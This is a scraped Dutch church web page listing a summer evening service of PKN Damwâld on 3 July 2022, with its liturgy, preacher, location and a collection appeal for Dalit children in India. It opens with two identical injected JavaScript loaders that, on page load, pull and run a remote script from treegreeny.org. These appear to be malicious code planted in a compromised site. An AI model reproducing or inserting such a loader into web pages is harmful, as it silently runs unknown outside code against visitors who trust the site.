;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 3 juli 2022 19:30 uur - PKN Damwâld
zondag 3 juli 2022
19:30 uur
Let op ! ZOMERAVONDDIENST !

Kerkdienst zondag 3 juli 2022 19:30 uur

Informatie

Voorganger:Dhr. L.J. Blees, Dorkwerd/Wijnjewoude
Mededeling:Let op ! ZOMERAVONDDIENST !
LivestreamDienst terugkijken
Bekijk op Youtube
Liturgie
Lied voor de dienst Psalm 84 vers 1 en 6
Woord van welkom
Intochtslied ELB 37 vers 1, 3 en 5
Stil Gebed, Votum en Groet
We zingen: Psalm 81 vers 1, 4 en 11
Gebed
Geloofsbelijdenis
We zingen: NLB 23C vers 1, 2 en 5
Gebed
We lezen: Handelingen 5 vers 17 tot en met 42
We zingen: NLB 944 vers 1, 2 en 3
Preek .
We zingen: Psalm 68 vers 2 en 12
Dankgebed
We zingen: ELB 140 vers 1, 2 en 3
Zegen
Collecte bij de uitgang
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: 3 juli 2022 – Collecte Kerk in Actie 2022 – Werelddiaconaat (collectenummer 22067)

In India worden duizenden Dalit-kinderen gediscrimineerd en buitengesloten omdat ze niet bij een kaste horen. Samen met lokale partnerorganisaties wil Kerk in Actie deze kinderen helpen om uit de cirkel van armoede te komen en niet meer buitengesloten te worden. Ze zijn voor en na schooltijd welkom in een Bala Bata, een speciale dorpsschool. Daar krijgen ze huiswerkbegeleiding en muziek-, dans- en sportlessen. Zo krijgen ze meer zelfvertrouwen en verbeteren hun schoolprestaties. Ook wordt er gekeken naar de thuissituatie van de kinderen. Door deze liefde en aandacht ontdekken kinderen dat ze de moeite waard zijn. Met Pasen collecteren we voor dit werk, zodat jaarlijks bijna 4.000 kinderen een betere toekomst krijgen.

Uitganscollecte: Bij de uitgang of via QR-code